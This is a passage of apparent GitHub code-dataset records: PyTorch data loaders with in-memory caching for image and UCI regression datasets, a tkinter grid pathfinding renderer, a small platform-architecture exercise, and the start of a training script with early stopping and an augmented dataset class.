3 for RGB and 1 for monochrome images.\n \"\"\"\n self.data = data\n self.images = torch.zeros(len(data), channels, img_size, img_size)\n self.targets = torch.zeros(len(data)).long()\n self.use_cache = False\n\n def pin_memory(self):\n \"\"\"Uses the PyTorch mechanism of pinning data to memory.\"\"\"\n self.images = self.images.pin_memory()\n self.targets = self.targets.pin_memory()\n return self\n\n def set_use_cache(self,\n use_cache: bool):\n \"\"\"Switch activating the use of the stored data.\n\n Args:\n use_cache: Whether to use the cache.\n \"\"\"\n self.use_cache = use_cache\n\n def __getitem__(self,\n index: int):\n if self.use_cache:\n if index < 1:\n return self.images, self.targets\n else:\n raise StopIteration()\n else:\n self.images[index] = self.data[index][0]\n self.targets[index] = self.data[index][1]\n return self.images[index], self.targets[index]\n\n def __len__(self):\n if self.use_cache:\n return 1\n else:\n return len(self.data)\n\n\nclass Cashed(Dataset):\n \"\"\"Similar to the Memory class, but can be used with multiprocessing.\"\"\"\n\n def __init__(self,\n data: Dataset,\n img_size: int = 224,\n channels: int = 3):\n \"\"\"Creates a `Cashed` object, storing a dataset in RAM.\n\n Args:\n data: A PyTorch dataset.\n img_size: The size of the image.\n channels: Number of color channels, i.e. 3 for RGB and 1 for monochrome images.\n \"\"\"\n self.data = data\n shared_array_base = mp.Array(ctypes.c_float, len(data) * channels * img_size ** 2)\n shared_array_base_labels = mp.Array(ctypes.c_long, len(data))\n shared_array = np.ctypeslib.as_array(shared_array_base.get_obj())\n shared_array_labels = np.ctypeslib.as_array(shared_array_base_labels.get_obj())\n shared_array = shared_array.reshape(len(data), channels, img_size, img_size)\n self.shared_array = torch.from_numpy(shared_array)\n self.shared_array_labels = torch.from_numpy(shared_array_labels).long()\n self.use_cache = False\n\n def pin_memory(self):\n \"\"\"Uses the PyTorch mechanism of pinning data to memory.\"\"\"\n self.shared_array = self.shared_array.pin_memory()\n self.shared_array_labels = self.shared_array_labels.pin_memory()\n return self\n\n def set_use_cache(self,\n use_cache: bool):\n \"\"\"Switch activating the use of the stored data.\n\n Args:\n use_cache (bool): Whether to use the cache.\n \"\"\"\n self.use_cache = use_cache\n\n def __getitem__(self,\n index: int):\n if not self.use_cache:\n self.shared_array[index] = self.data[index][0]\n self.shared_array_labels[index] = self.data[index][1]\n return self.shared_array[index], self.shared_array_labels[index]\n\n def __len__(self):\n return len(self.data)\n\n\nLoaderTypes = Union[DataLoader,\n Memory,\n List[DataLoader],\n List[Memory]]\n\n\ndef uci(root: str,\n name: str,\n split: int = 1):\n if name.lower() in [\"boston\", \"housing\", \"boston housing\", \"boston_housing\"]:\n path = os.path.join(root, \"boston_housing.data\")\n data = np.loadtxt(path)\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() == \"kin8nm\":\n path = os.path.join(root, \"kin8nm.csv\")\n data = np.loadtxt(path, delimiter=',', skiprows=1)\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() in [\"naval\", \"naval propulsion\", \"naval_propulsion\"]:\n path = os.path.join(root, \"naval_propulsion.txt\")\n data = np.loadtxt(path)\n inputs, targets = data[:, :-2], data[:, -2:]\n elif name.lower() in [\"protein\", \"protein structure\", \"protein_structure\"]:\n path = os.path.join(root, \"protein_structure.csv\")\n data = np.loadtxt(path, 
delimiter=',', skiprows=1)\n        inputs, targets = data[:, 1:], data[:, 0]\n    elif name.lower() in [\"wine\", \"wine quality\", \"wine quality red\", \"wine_quality\", \"wine_quality_red\"]:\n        path = os.path.join(root, \"wine_quality_red.csv\")\n        data = np.loadtxt(path, delimiter=';', skiprows=1)\n        inputs, targets = data[:, :-1], data[:, -1]\n    elif name.lower() in [\"yacht\", \"yacht hydrodynamics\", \"yacht_hydrodynamics\"]:\n        path = os.path.join(root, \"yacht_hydrodynamics.data\")\n        data = np.loadtxt(path)\n        inputs, targets = data[:, :-1], data[:, -1]\n    elif name.lower() in [\"power\", \"power plant\", \"combined cycle power plant\", \"power_plant\",\n                          \"combined_cycle_power_plant\"]:\n        path = os.path.join(root, \"combined_cycle_power_plant.xlsx\")\n        data = pd.read_excel(path).to_numpy()\n        inputs, targets = data[:, :-1], data[:, -1]\n    elif name.lower() in [\"concrete\", \"concrete compression\", \"concrete compression strength\", \"concrete_compression\",\n                          \"concrete_compression_strength\"]:\n        path = os.path.join(root, \"concrete_compression_strength.xls\")\n        data = pd.read_excel(path).to_numpy()\n        inputs, targets = data[:, :-1], data[:, -1]\n    elif name.lower() in [\"energy\", \"efficiency\", \"energy efficiency\", \"energy_efficiency\"]:\n        path = os.path.join(root, \"energy_efficiency.xlsx\")\n        data = pd.read_excel(path).to_numpy()\n        inputs, targets = data[:, :-2], data[:, -2:]\n\n    if len(targets.shape) < 2:\n        targets = np.expand_dims(targets, axis=1)\n\n    x_train, x_test, y_train, y_test = train_test_split(inputs, targets, test_size=.1, random_state=split)\n    return (x_train, y_train), (x_test, y_test)\n\n\ndef sarcos(root: str):\n    sarcos_inv = scipy.io.loadmat(os.path.join(root, \"sarcos_inv.mat\"))\n    sarcos_inv_test = scipy.io.loadmat(os.path.join(root, \"sarcos_inv_test.mat\"))\n\n    x_train = sarcos_inv[\"sarcos_inv\"][:, :21]\n    y_train = sarcos_inv[\"sarcos_inv\"][:, 21:]\n    x_test = sarcos_inv_test[\"sarcos_inv_test\"][:, :21]\n    y_test = sarcos_inv_test[\"sarcos_inv_test\"][:, 21:]\n\n    return (x_train, y_train), (x_test, y_test)\n\n\ndef kuka(root: str, part=1):\n    train = np.loadtxt(os.path.join(root, f\"kuka_real_dataset{part}\", f\"kuka{part}_online.txt\"))\n    test = np.loadtxt(os.path.join(root, f\"kuka_real_dataset{part}\", f\"kuka{part}_offline.txt\"))\n\n    x_train = train[:, :21]\n    y_train = train[:, 21:]\n    x_test = test[:, :21]\n    y_test = test[:, 21:]\n\n    return (x_train, y_train), (x_test, y_test)\n\n\ndef mnist(root: str,\n          batch_size: int = 32,\n          workers: int = 6,\n          augment: bool = True,\n          splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n    \"\"\"Wrapper for loading the `MNIST` dataset.\n\n    Args:\n        root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n        batch_size: The batch size.\n        workers: The number of CPUs to use when loading the data from disk.\n        augment: Whether to use data augmentation when training.\n        splits: Which splits of the data to return. 
Possible values are `train`, `val` and `test`.\n\n    Returns:\n        A list of data loaders of the chosen splits.\n    \"\"\"\n    val_transform = ToTensor()\n    if augment:\n        transform = Compose([Binarize(), ToTensor()])\n    else:\n        transform = val_transform\n\n    loader_list = list()\n    if 'train' in splits:\n        train_set = MNIST(root, train=True, transform=transform, download=True)\n        train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers, pin_memory=True)\n        loader_list.append(train_loader)\n    if 'test' in splits or 'val' in splits:\n        val_test_set = MNIST(root, train=False, transform=val_transform, download=True)\n        val_set, test_set = torch.utils.data.random_split(val_test_set, [5000, 5000])\n\n        if 'val' in splits:\n            val_set = Memory(val_set, img_size=28, channels=1)\n            for _ in val_set:\n                pass\n            val_set.set_use_cache(True)\n            val_set.pin_memory()\n            loader_list.append(val_set)\n\n        if 'test' in splits:\n            test_set = Memory(test_set, img_size=28, channels=1)\n            for _ in test_set:\n                pass\n            test_set.set_use_cache(True)\n            test_set.pin_memory()\n            loader_list.append(test_set)\n\n    if len(loader_list) == 1:\n        return loader_list[0]\n    return loader_list\n\n\ndef kmnist(root: str,\n           batch_size: int = 32,\n           workers: int = 6,\n           splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n    \"\"\"Wrapper for loading the `KMNIST` dataset.\n\n    Args:\n        root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n        batch_size: The batch size.\n        workers: The number of CPUs to use when loading the data from disk.\n        splits: Which splits of the data to return. Possible values are `train`, `val` and `test`.\n\n    Returns:\n        A list of data loaders of the chosen splits.\n    \"\"\"\n    loader_list = list()\n    if 'train' in splits or 'val' in splits:\n        train_val_set = KMNIST(root, train=True, download=True, transform=ToTensor())\n\n        val_set, train_set = torch.utils.data.random_split(train_val_set, [10000, len(train_val_set) - 10000])\n        if 'train' in splits:\n            train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers,\n                                      pin_memory=True)\n            loader_list.append(train_loader)\n        if 'val' in splits:\n            val_set = Memory(val_set, img_size=28, channels=1)\n            for _ in val_set:\n                pass\n            val_set.set_use_cache(True)\n            val_set.pin_memory()\n            loader_list.append(val_set)\n    if 'test' in splits:\n        test_set = KMNIST(root, train=False, download=True, transform=ToTensor())\n        test_set = Memory(test_set, img_size=28, channels=1)\n        for _ in test_set:\n            pass\n        test_set.set_use_cache(True)\n        test_set.pin_memory()\n        loader_list.append(test_set)\n\n    if len(loader_list) == 1:\n        return loader_list[0]\n    return loader_list\n\n\ndef cifar10(root: str,\n            batch_size: int = 32,\n            workers: int = 6,\n            augment: bool = True,\n            splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n    \"\"\"Wrapper for loading the `CIFAR10` dataset.\n\n    Args:\n        root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n        batch_size: The batch size.\n        workers: The number of CPUs to use when loading the data from disk.\n        augment: Whether to use data augmentation when training.\n        splits: Which splits of the data to return. 
Possible values are `train`, `val` and `test`.\n\n    Returns:\n        A list of data loaders of the chosen splits.\n    \"\"\"\n    normalize = Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])\n    val_transform = Compose([ToTensor(), normalize])\n    if augment:\n        transform = Compose(\n            [RandomCrop(32, padding=4),\n             RandomHorizontalFlip(),\n             ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n             RandomRotation(degrees=5),\n             ToTensor(),\n             normalize])\n    else:\n        transform = val_transform\n\n    loader_list = list()\n    if 'train' in splits:\n        train_val_set = CIFAR10(root, train=True, transform=transform, download=True)\n        train_loader = DataLoader(train_val_set, batch_size=batch_size, shuffle=True, num_workers=workers,\n                                  pin_memory=True)\n        loader_list.append(train_loader)\n    if 'test' in splits or 'val' in splits:\n        val_test_set = CIFAR10(root, train=False, transform=val_transform, download=True)\n        val_set, test_set = torch.utils.data.random_split(val_test_set, [5000, 5000])\n\n        if 'val' in splits:\n            val_set = Memory(val_set, img_size=32, channels=3)\n            for _ in val_set:\n                pass\n            val_set.set_use_cache(True)\n            val_set.pin_memory()\n            loader_list.append(val_set)\n\n        if 'test' in splits:\n            test_set = Memory(test_set, img_size=32, channels=3)\n            for _ in test_set:\n                pass\n            test_set.set_use_cache(True)\n            test_set.pin_memory()\n            loader_list.append(test_set)\n\n    if len(loader_list) == 1:\n        return loader_list[0]\n    return loader_list\n\n\ndef svhn(root: str,\n         batch_size: int = 32,\n         workers: int = 6,\n         splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n    \"\"\"Wrapper for loading the `SVHN` dataset.\n\n    Args:\n        root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n        batch_size: The batch size.\n        workers: The number of CPUs to use when loading the data from disk.\n        splits: Which splits of the data to return. 
Possible values are `train`, `val` and `test`.\n\n    Returns:\n        A list of data loaders of the chosen splits.\n    \"\"\"\n    transform = Compose([ToTensor(), Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n\n    loader_list = list()\n    if 'train' in splits:\n        train_set = SVHN(root, split='train', transform=transform, download=True)\n        train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers, pin_memory=True)\n        loader_list.append(train_loader)\n    if 'test' in splits or 'val' in splits:\n        val_test_set = SVHN(root, split='test', transform=transform, download=True)\n        val_set, test_set, rest = torch.utils.data.random_split(val_test_set, [5000, 5000, len(val_test_set) - 10000])\n\n        if 'val' in splits:\n            val_set = Memory(val_set, img_size=32, channels=3)\n            for _ in val_set:\n                pass\n            val_set.set_use_cache(True)\n            val_set.pin_memory()\n            loader_list.append(val_set)\n\n        if 'test' in splits:\n            test_set = Memory(test_set, img_size=32, channels=3)\n            for _ in test_set:\n                pass\n            test_set.set_use_cache(True)\n            test_set.pin_memory()\n            loader_list.append(test_set)\n\n    if len(loader_list) == 1:\n        return loader_list[0]\n    return loader_list\n\n\ndef art(root: str,\n        img_size: int = 224,\n        batch_size: int = 32,\n        workers: int = 6,\n        pin_memory: bool = True,\n        use_cache: bool = False,\n        pre_cache: bool = False) -> DataLoader:\n    \"\"\"A dataset consisting of works of art; mostly paintings.\n    Source: https://www.kaggle.com/c/painter-by-numbers/data.\n\n    Args:\n        root: The root directory where the image data is stored.\n        img_size: The size of the image.\n        batch_size: The batch size.\n        workers: The number of CPUs to use when loading the data from disk.\n        pin_memory: Whether to use PyTorch's `pin memory` mechanism.\n        use_cache: Whether to cache data in a `Cache` object.\n        pre_cache: Whether to run caching before the first epoch.\n\n    Returns:\n        Data loader of the test split.\n    \"\"\"\n    transform = Compose([\n        Resize(int(img_size * 8 / 7)),\n        CenterCrop(img_size),\n        ToTensor(),\n        Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n    ])\n\n    data = ImageFolder(root, transform)\n    test_set, rest_set = torch.utils.data.random_split(data, [25000, len(data) - 25000])\n    if use_cache:\n        test_set = Cashed(test_set, img_size, channels=3)\n    test_loader = DataLoader(test_set, batch_size=batch_size, num_workers=workers, pin_memory=pin_memory)\n    if use_cache and pre_cache:\n        print(\"Caching\")\n        for _ in tqdm(test_loader):\n            pass\n        test_loader.dataset.set_use_cache(True)\n        # test_loader.dataset.pin_memory()\n    return test_loader\n\n\ndef imagenet(root: str,\n             img_size: int = 224,\n             batch_size: int = 32,\n             augment: bool = True,\n             workers: int = 6,\n             splits: Union[str, Tuple[str]] = ('train', 'val'),\n             tiny: bool = False,\n             pin_memory: bool = True,\n             use_cache: bool = False,\n             pre_cache: bool = False) -> Union[DataLoader, List[DataLoader]]:\n    \"\"\"Data loader for the ImageNet dataset.\n\n    Args:\n        root: The root directory where the image data is stored. Must contain a `train` and `val` directory with\n            training and validation data respectively. If `tiny` is set to True, it must contain a `tiny` directory.\n        img_size: The size of the image.\n        batch_size: The batch size.\n        augment: Whether to use data augmentation techniques.\n        workers: The number of CPUs to use when loading the data from disk.\n        splits: Which splits of the data to return. Possible values are `train` and `val`.\n        tiny: Whether to use the `Tiny ImageNet dataset `_ instead of the\n            full-size data. 
If True, `root` must contain a `tiny` directory with `train` and `val` directories inside.\n        pin_memory: Whether to use PyTorch's `pin memory` mechanism.\n        use_cache: Whether to cache data in a `Cache` object.\n        pre_cache: Whether to run caching before the first epoch.\n\n    Returns:\n        A list of data loaders of the chosen splits.\n    \"\"\"\n    if tiny:\n        root = os.path.join(root, 'tiny')\n    train_dir = os.path.join(root, 'train')\n    test_dir = os.path.join(root, 'val')\n\n    normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n    val_transform_list = list()\n    if not tiny:\n        val_transform_list.append(Resize(int(img_size * 8 / 7)))\n    val_transform_list.append(CenterCrop(img_size))\n    val_transform_list.append(ToTensor())\n    val_transform_list.append(normalize)\n    val_transform = Compose(val_transform_list)\n\n    train_transform_list = list()\n    if tiny:\n        train_transform_list.append(RandomCrop(img_size, padding=8))\n    else:\n        train_transform_list.append(RandomResizedCrop(img_size))\n    train_transform_list.append(RandomHorizontalFlip())\n    train_transform_list.append(ToTensor())\n    train_transform_list.append(normalize)\n    train_transform = Compose(train_transform_list)\n\n    loader_list = list()\n    if 'train' in splits:\n        train_set = ImageFolder(train_dir, train_transform if augment else val_transform)\n        train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers,\n                                  pin_memory=pin_memory)\n        loader_list.append(train_loader)\n\n    if 'val' in splits or 'test' in splits:\n        val_test_set = ImageFolder(test_dir, val_transform)\n        val_set, test_set = torch.utils.data.random_split(val_test_set, [25000, 25000])\n\n        if 'test' in splits:\n            if use_cache:\n                test_set = Cashed(test_set, img_size, channels=3)\n            test_loader = DataLoader(test_set, batch_size=batch_size, num_workers=workers, pin_memory=pin_memory)\n            if use_cache and pre_cache:\n                print(\"Caching\")\n                for _ in tqdm(test_loader):\n                    pass\n                test_loader.dataset.set_use_cache(True)\n                # test_loader.dataset.pin_memory()\n            loader_list.append(test_loader)\n\n        if 'val' in splits:\n            if use_cache:\n                val_set = Cashed(val_set, img_size, channels=3)\n            val_loader = DataLoader(val_set, batch_size=batch_size, num_workers=workers, pin_memory=pin_memory)\n            if use_cache and pre_cache:\n                print(\"Caching\")\n                for _ in tqdm(val_loader):\n                    pass\n                val_loader.dataset.set_use_cache(True)\n                # val_loader.dataset.pin_memory()\n            loader_list.append(val_loader)\n\n    if len(loader_list) == 1:\n        return loader_list[0]\n    return loader_list\n\n\nLoaderLists = Union[\n    Union[List[Cashed], List[Memory]],\n    Union[List[Cashed], List[DataLoader]],\n    Union[List[Memory], List[DataLoader]],\n    Union[List[Memory], List[DataLoader], List[Cashed]]]\n\n\ndef gtsrb(root: str,\n          img_size: int = 32,\n          batch_size: int = 32,\n          workers: int = 6,\n          splits: Union[str, Tuple[str]] = ('train', 'val'),\n          pin_memory: bool = True) -> Union[LoaderTypes, Cashed, LoaderLists]:\n    \"\"\"Data loader for the `German Traffic Sign Recognition Benchmark\n    `_.\n\n    Args:\n        root: The root directory where the image data is stored. Must contain a `train`, `val` and `test` directory with\n        training, validation and test data respectively.\n        img_size: The size of the image.\n        batch_size: The batch size.\n        workers: The number of CPUs to use when loading the data from disk.\n        splits: Which splits of the data to return. 
Possible values are `train`, `val` and `test`.\n        pin_memory: Whether to use PyTorch's `pin memory` mechanism.\n\n    Returns:\n        A list of data loaders of the chosen splits.\n    \"\"\"\n    train_dir = os.path.join(root, 'train')\n    val_dir = os.path.join(root, 'val')\n    test_dir = os.path.join(root, 'test')\n\n    normalize = Normalize([0.34038433, 0.3119956, 0.32119358], [0.05087305, 0.05426421, 0.05859348])\n    if img_size > 32:\n        val_transform = Compose([Resize(int(img_size * 8 / 7)),\n                                 CenterCrop(img_size),\n                                 ToTensor(),\n                                 normalize])\n        train_transform = Compose([RandomResizedCrop(img_size),\n                                   RandomAffine(degrees=15, translate=(0.1, 0.1), shear=10),\n                                   ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n                                   ToTensor(),\n                                   normalize])\n    else:\n        val_transform = Compose([Resize(img_size + 10),\n                                 CenterCrop(img_size),\n                                 ToTensor(),\n                                 normalize])\n        train_transform = Compose([RandomCrop(img_size, padding=4),\n                                   RandomAffine(degrees=15, translate=(0.1, 0.1), scale=(0.9, 1.1), shear=10),\n                                   ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n                                   ToTensor(),\n                                   normalize])\n\n    loader_list = list()\n    if 'train' in splits:\n        train_set = ImageFolder(train_dir, train_transform)\n\n        weights = list()\n        for c in range(43):\n            dir_name = f\"000{c}\" if c > 9 else f\"0000{c}\"\n            weights.append(len(os.listdir(os.path.join(train_dir, dir_name))[:-1]))\n        weights = 1 / np.array(weights)\n        weights = np.array([weights[t] for t in train_set.targets])\n        sampler = torch.utils.data.sampler.WeightedRandomSampler(torch.from_numpy(weights).double(), len(weights))\n\n        train_loader = DataLoader(train_set, batch_size=batch_size, sampler=sampler, num_workers=workers,\n                                  pin_memory=pin_memory)\n        loader_list.append(train_loader)\n    if 'val' in splits:\n        val_set = ImageFolder(val_dir, val_transform)\n        if img_size > 32:\n            val_set = Cashed(val_set, img_size, channels=3)\n            val_loader = DataLoader(val_set, batch_size=batch_size, num_workers=workers,\n                                    pin_memory=pin_memory)\n            for _ in val_loader:\n                pass\n            val_loader.dataset.set_use_cache(True)\n            val_loader.dataset.pin_memory()\n            loader_list.append(val_loader)\n        else:\n            val_set = Memory(val_set, img_size=img_size, channels=3)\n            for _ in val_set:\n                pass\n            val_set.set_use_cache(True)\n            val_set.pin_memory()\n            loader_list.append(val_set)\n\n    if 'test' in splits:\n        test_set = ImageFolder(test_dir, val_transform)\n        test_set = Memory(test_set, img_size=img_size, channels=3)\n        for _ in test_set:\n            pass\n        test_set.set_use_cache(True)\n        test_set.pin_memory()\n        loader_list.append(test_set)\n\n    if len(loader_list) == 1:\n        return loader_list[0]\n    return loader_list\n","repo_name":"DLR-RM/curvature","sub_path":"curvature/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":27842,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"}
+{"seq_id":"21624332451","text":"from tkinter import *\nimport time\nfrom MapLogic import *\nfrom Path import *\nimport random\n\nrenderMap = Map([20,16],50)\n\nX = renderMap.dim[0]*renderMap.div\nY = renderMap.dim[1]*renderMap.div\nh = renderMap.div # Grid division width\n\ninitReg = random.randrange(0,renderMap.dim[0]*renderMap.dim[1]+1)\ntermReg = random.choice([random.randrange(0,initReg), random.randrange(initReg + 1, renderMap.dim[0]*renderMap.dim[1]+1)])\n\n\ndrawnObstacles = {}\n\ndef toggleObstacle(event):\n    reg = renderMap.regionList[renderMap.objCoordinateToRef([event.x,event.y])]\n    if reg.ref in drawnObstacles:\n        canvas.delete(\"obstacle\" + str(reg.ref))\n        
drawnObstacles.pop(reg.ref)\n        renderMap.regionList[reg.ref].traverse = True\n\n    else:\n        renderMap.regionList[reg.ref].traverse = False\n        drawnObstacles[reg.ref] = canvas.create_rectangle([i*h for i in reg.corners[0] + reg.corners[2]], fill=\"grey20\", outline=\"\", tags=\"obstacle\" + str(reg.ref))\n\ndef printObstacles(event):\n    print(drawnObstacles.keys())\n\ndef genPath(event):\n    path, queue = floodFill(renderMap,initReg,termReg)\n    colours = colourGradient(len(path))\n    print(path)\n    print(queue)\n    for x in queue:\n        reference = x[0]\n        region = renderMap.regionList[reference]\n        canvas.create_rectangle([i*h for i in region.corners[0] + region.corners[2]], fill=colours[x[1]], outline=\"\")\n    \n    for j in range(0,len(path)-1):\n        canvas.create_line([k*h for k in renderMap.regionList[path[j]].centre + renderMap.regionList[path[j+1]].centre], fill=\"#094481\", width=4)\n        #canvas.create_oval([renderMap.regionList[path[j+1]].corners[0]*h-2, renderMap.regionList[path[j+1]].corners[1]*h-2, renderMap.regionList[path[j+1]].corners[0]*h+2, renderMap.regionList[path[j+1]].corners[1]*h+2], fill=\"#094481\", width=4)\n\n\n\n\n\ndef colourGradient(maxSteps):\n    startGreenRGB = [250,250,110]\n    endRedRGB = [159,21,21]\n    output = ['#%02x%02x%02x' % (startGreenRGB[0], startGreenRGB[1], startGreenRGB[2])]\n\n    for i in range(1,maxSteps):\n        output.append('#%02x%02x%02x' % (startGreenRGB[0]+i*(endRedRGB[0]-startGreenRGB[0])//maxSteps, startGreenRGB[1]+i*(endRedRGB[1]-startGreenRGB[1])//maxSteps, startGreenRGB[2]+i*(endRedRGB[2]-startGreenRGB[2])//maxSteps))\n    \n    output.append('#%02x%02x%02x' % (endRedRGB[0], endRedRGB[1], endRedRGB[2]))\n\n    return output\n\ngui = Tk()\ngui.geometry(str(X) + \"x\" + str(Y))\ngui.title(\"Pathfinder\")\n\ncanvas = Canvas(gui, width=X, height=Y, bg='grey90')\ncanvas.bind(\"<Button-1>\", toggleObstacle)\ncanvas.bind(\"<Button-3>\", printObstacles)\ngui.bind(\"<Return>\", genPath)\ncanvas.pack()\n\n# Creates vertical grid lines\nfor i in range(0,X,h):\n    canvas.create_line(i,0,i,Y, fill=\"grey80\", width=2)\n\n# Creates horizontal grid lines\nfor j in range(0,Y,h):\n    canvas.create_line(0,j,X,j, fill=\"grey80\", width=2)\n\n# Create the start and end point rectangles.\ncanvas.create_rectangle([i*h for i in renderMap.regionList[initReg].corners[0] + renderMap.regionList[initReg].corners[2]], fill=\"#af3448\")\ncanvas.create_rectangle([i*h for i in renderMap.regionList[termReg].corners[0] + renderMap.regionList[termReg].corners[2]], fill=\"#360981\")\n\ngui.mainloop()\n\n","repo_name":"AdamDriver26/Pathfinding","sub_path":"Render.py","file_name":"Render.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"8877041117","text":"#!/usr/bin/env python3\n\nimport platform\n\ntask = \"\"\"\nTask:\nWrite a Python program to determine if a Python shell is executing in 32-bit or 64-bit mode on the OS. 
\n\"\"\"\n\nprint(task)\n\nprint(\"OS mode is\", platform.architecture()[0])","repo_name":"woodyart/py-excercises","sub_path":"basic-part-i/042.py","file_name":"042.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"15659445718","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder editor\r\n\r\nThis is a temporary script.\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.axes_grid1 import ImageGrid\r\nimport os\r\nimport time\r\n\r\nimport torch\r\nfrom torch.distributions import Normal\r\nimport torchvision\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom tqdm import trange\r\n\r\nfrom torchvision.transforms import transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.data import Dataset\r\nimport seaborn as sns\r\nimport imgaug\r\n#from keras.datasets import mnist\r\nfrom imgaug import augmenters as iaa\r\n#from keras.utils import np_utils\r\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\r\n\r\n#@title Early Stopping class\r\nclass EarlyStopping:\r\n    \"\"\"Early stops the training if validation loss doesn't improve after a given patience.\"\"\"\r\n    def __init__(self, patience=7, verbose=False, delta=0):\r\n        \"\"\"\r\n        Args:\r\n            patience (int): How long to wait after last time validation loss improved.\r\n                            Default: 7\r\n            verbose (bool): If True, prints a message for each validation loss improvement.\r\n                            Default: False\r\n            delta (float): Minimum change in the monitored quantity to qualify as an improvement.\r\n                            Default: 0\r\n        \"\"\"\r\n        self.patience = patience\r\n        self.verbose = verbose\r\n        self.counter = 0\r\n        self.best_score = None\r\n        self.early_stop = False\r\n        self.val_loss_min = np.Inf\r\n        self.delta = delta\r\n\r\n    def __call__(self, val_loss, model, path):\r\n\r\n        score = -val_loss\r\n        # 1st iteration\r\n        if self.best_score is None:\r\n            self.best_score = score\r\n            self.save_checkpoint(val_loss, model, path)\r\n        elif score < self.best_score + self.delta:\r\n            self.counter += 1\r\n            print(f'EarlyStopping counter: {self.counter} out of {self.patience}')\r\n            if self.counter >= self.patience:\r\n                self.early_stop = True\r\n        else:\r\n            self.best_score = score\r\n            self.save_checkpoint(val_loss, model, path)\r\n            self.counter = 0\r\n\r\n    def save_checkpoint(self, val_loss, model, path):\r\n        '''Saves model when validation loss decreases.'''\r\n        if self.verbose:\r\n            print(f'Validation loss decreased ({self.val_loss_min:.6f} --> {val_loss:.6f}). 
Saving model ...')\r\n # if not os.path.exists(path):\r\n # os.makedirs(path)\r\n # torch.save(model.state_dict(), path+'/checkpoint.pt')\r\n self.val_loss_min = val_loss\r\n\r\n# @title Dataset class\r\nclass MyData(Dataset):\r\n 'Characterizes a dataset for PyTorch'\r\n def __init__(self, data, labels, return_perturb=False, sample_size=None, augmentation=None, training=False):\r\n 'Initialization'\r\n self.labels = labels\r\n self.data = data\r\n self.return_perturb = return_perturb\r\n self.augmentation = augmentation\r\n self.sample_size = sample_size\r\n self.training = training\r\n\r\n def __len__(self):\r\n 'Denotes the total number of samples'\r\n return len(self.data)\r\n\r\n def __getitem__(self, index):\r\n 'Generates one sample of data'\r\n # Select sample\r\n X = self.data[index]\r\n h, w = X.shape\r\n # Load data and get label\r\n y = self.labels[index]\r\n if self.return_perturb==False:\r\n X = X.reshape(-1)\r\n return X,y\r\n elif self.sample_size > 1:\r\n X = X.cpu()\r\n y = y.cpu()\r\n X_repeated = np.tile(X, [self.sample_size, 1, 1]) # Because we want X.shape = (sample_size, 28,28)\r\n y_repeated = np.tile(y, [self.sample_size, 1]) # Because we want y.shape = (sample_size, 10)\r\n X_aug = self.augmentation(images=X_repeated)\r\n if self.training:\r\n # import pdb; pdb.set_trace()\r\n X_repeated = X_repeated.reshape(self.sample_size,-1)\r\n X_aug = X_aug.reshape(self.sample_size,-1)\r\n return X_repeated, X_aug, y_repeated\r\n else:\r\n X_aug = self.augmentation(images=X)\r\n X_aug = X_aug.reshape(-1)\r\n X = X.reshape(-1)\r\n return X, X_aug, y\r\n\r\n# @title Gaussian Layer class\r\nclass GaussianLayer(nn.Module):\r\n def __init__(self, shape, standard=False):\r\n super(GaussianLayer, self).__init__()\r\n self.shape = shape\r\n if standard is True:\r\n self.mu = nn.Parameter(torch.zeros(shape))\r\n self.log_var = nn.Parameter(torch.zeros(shape))\r\n else:\r\n self.mu = nn.Parameter(torch.rand(shape))\r\n self.log_var = nn.Parameter(torch.rand(shape))\r\n\r\n def forward(self, num_samples=1):\r\n if not isinstance(num_samples, tuple):\r\n num_samples = (num_samples,)\r\n eps_shape = num_samples + self.shape\r\n eps = torch.randn(eps_shape) # ~ N(0,I)\r\n return self.mu + torch.exp(self.log_var) * eps\r\n\r\n def entropy(self):\r\n distribution = Normal(loc=self.mu, scale=self.log_var.exp())\r\n return distribution.entropy().mean()\r\n\r\n\r\n# @title Invariant Prior class\r\n############### 2. 
